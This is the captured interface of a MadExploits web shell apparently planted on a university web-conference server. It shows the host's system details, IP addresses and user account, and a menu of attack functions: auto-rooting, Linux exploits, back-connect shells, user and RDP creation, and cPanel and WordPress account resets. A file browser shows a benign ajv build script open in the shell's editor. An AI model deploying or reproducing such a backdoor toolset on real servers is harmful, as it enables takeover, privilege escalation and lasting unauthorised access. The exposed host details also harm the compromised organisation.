Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.226.200.44
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
ajv /
scripts /
[ HOME SHELL ]
Name
Size
Permission
Action
bundle.js
1.75
KB
-rw-r--r--
compile-dots.js
2.38
KB
-rw-r--r--
info
289
B
-rwxr-xr-x
prepare-tests
269
B
-rwxr-xr-x
publish-built-version
840
B
-rwxr-xr-x
travis-gh-pages
872
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : publish-built-version
#!/usr/bin/env bash set -e if [[ -n $TRAVIS_TAG && $TRAVIS_JOB_NUMBER =~ ".3" ]]; then echo "About to publish $TRAVIS_TAG to ajv-dist..." git config user.email "$GIT_USER_EMAIL" git config user.name "$GIT_USER_NAME" git clone https://${GITHUB_TOKEN}@github.com/epoberezkin/ajv-dist.git ../ajv-dist rm -rf ../ajv-dist/dist mkdir ../ajv-dist/dist cp ./dist/ajv.* ../ajv-dist/dist cat bower.json | sed 's/"name": "ajv"/"name": "ajv-dist"/' > ../ajv-dist/bower.json cd ../ajv-dist if [[ `git status --porcelain` ]]; then echo "Changes detected. Updating master branch..." git add -A git commit -m "updated by travis build #$TRAVIS_BUILD_NUMBER" git push --quiet origin master > /dev/null 2>&1 fi echo "Publishing tag..." git tag $TRAVIS_TAG git push --tags > /dev/null 2>&1 echo "Done" fi
Close